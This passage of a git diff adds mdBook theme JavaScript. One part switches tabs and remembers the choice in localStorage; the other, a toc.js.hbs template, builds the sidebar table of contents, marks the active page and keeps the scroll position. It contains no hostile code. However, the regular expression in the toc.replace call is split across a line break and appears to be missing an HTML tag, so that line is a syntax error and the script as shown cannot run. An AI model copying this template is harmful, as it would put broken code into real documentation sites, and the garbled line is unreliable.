+                child.classList.remove('hidden');
+            } else {
+                child.classList.add('hidden');
+            }
+        }
+    }
+};
+
+document.addEventListener('DOMContentLoaded', () => {
+    const tabs = document.querySelectorAll('.mdbook-tab');
+    for (const tab of tabs) {
+        tab.addEventListener('click', () => {
+            if (!(tab instanceof HTMLElement)) {
+                return;
+            }
+
+            if (!tab.parentElement || !tab.parentElement.parentElement) {
+                return;
+            }
+
+            const container = tab.parentElement.parentElement;
+            const name = tab.dataset.tabname;
+            const global = container.dataset.tabglobal;
+
+            changeTab(container, name);
+
+            if (global) {
+                localStorage.setItem(`mdbook-tabs-${global}`, name);
+
+                const globalContainers = document.querySelectorAll(
+                    `.mdbook-tabs-container[data-tabglobal="${global}"]`
+                );
+                for (const globalContainer of globalContainers) {
+                    changeTab(globalContainer, name);
+                }
+            }
+        });
+    }
+
+    const containers = document.querySelectorAll('.mdbook-tabs-container[data-tabglobal]');
+    for (const container of containers) {
+        const global = container.dataset.tabglobal;
+
+        const name = localStorage.getItem(`mdbook-tabs-${global}`);
+        if (name && document.querySelector(`.mdbook-tab[data-tabname=${name}]`)) {
+            changeTab(container, name);
+        }
+    }
+});
diff --git a/theme/toc.js.hbs b/theme/toc.js.hbs
new file mode 100644
index 000000000..5bc3c97a3
--- /dev/null
+++ b/theme/toc.js.hbs
@@ -0,0 +1,73 @@
+// Populate the sidebar
+//
+// This is a script, and not included directly in the page, to control the total size of the book.
+// The TOC contains an entry for each page, so if each page includes a copy of the TOC,
+// the total size of the page becomes O(n**2).
+class MDBookSidebarScrollbox extends HTMLElement {
+    constructor() {
+        super();
+    }
+    connectedCallback() {
+        // Modify TOC to support external links
+        var toc = '{{#toc}}{{/toc}}';
+        toc = toc.replace(/
([^$<>]*)\$\$external:([^$<>]*)\$\$<\/div>/g, '$1') 
+        this.innerHTML = toc
+        // Set the current, active page, and reveal it if it's hidden
+        let current_page = document.location.href.toString();
+        if (current_page.endsWith("/")) {
+            current_page += "index.html";
+        }
+        var links = Array.prototype.slice.call(this.querySelectorAll("a"));
+        var l = links.length;
+        for (var i = 0; i < l; ++i) {
+            var link = links[i];
+            var href = link.getAttribute("href");
+            if (href && !href.startsWith("#") && !/^(?:[a-z+]+:)?\/\//.test(href)) {
+                link.href = path_to_root + href;
+            }
+            // The "index" page is supposed to alias the first chapter in the book.
+            if (link.href === current_page || (i === 0 && path_to_root === "" && current_page.endsWith("/index.html"))) {
+                link.classList.add("active");
+                var parent = link.parentElement;
+                if (parent && parent.classList.contains("chapter-item")) {
+                    parent.classList.add("expanded");
+                }
+                while (parent) {
+                    if (parent.tagName === "LI" && parent.previousElementSibling) {
+                        if (parent.previousElementSibling.classList.contains("chapter-item")) {
+                            parent.previousElementSibling.classList.add("expanded");
+                        }
+                    }
+                    parent = parent.parentElement;
+                }
+            }
+        }
+        // Track and set sidebar scroll position
+        this.addEventListener('click', function(e) {
+            if (e.target.tagName === 'A') {
+                sessionStorage.setItem('sidebar-scroll', this.scrollTop);
+            }
+        }, { passive: true });
+        var sidebarScrollTop = sessionStorage.getItem('sidebar-scroll');
+        sessionStorage.removeItem('sidebar-scroll');
+        if (sidebarScrollTop) {
+            // preserve sidebar scroll position when navigating via links within sidebar
+            this.scrollTop = sidebarScrollTop;
+        } else {
+            // scroll sidebar to current active section when navigating via "next/previous chapter" buttons
+            var activeSection = document.querySelector('#sidebar .active');
+            if (activeSection) {
+                activeSection.scrollIntoView({ block: 'center' });
+            }
+        }
+        // Toggle buttons
+        var sidebarAnchorToggles = document.querySelectorAll('#sidebar a.toggle');
+        function toggleSection(ev) {
+            ev.currentTarget.parentElement.classList.toggle('expanded');
+        }
+        Array.from(sidebarAnchorToggles).forEach(function (el) {
+            el.addEventListener('click', toggleSection);
+        });
+    }
+}
+window.customElements.define("mdbook-sidebar-scrollbox", MDBookSidebarScrollbox);
\ No newline at end of file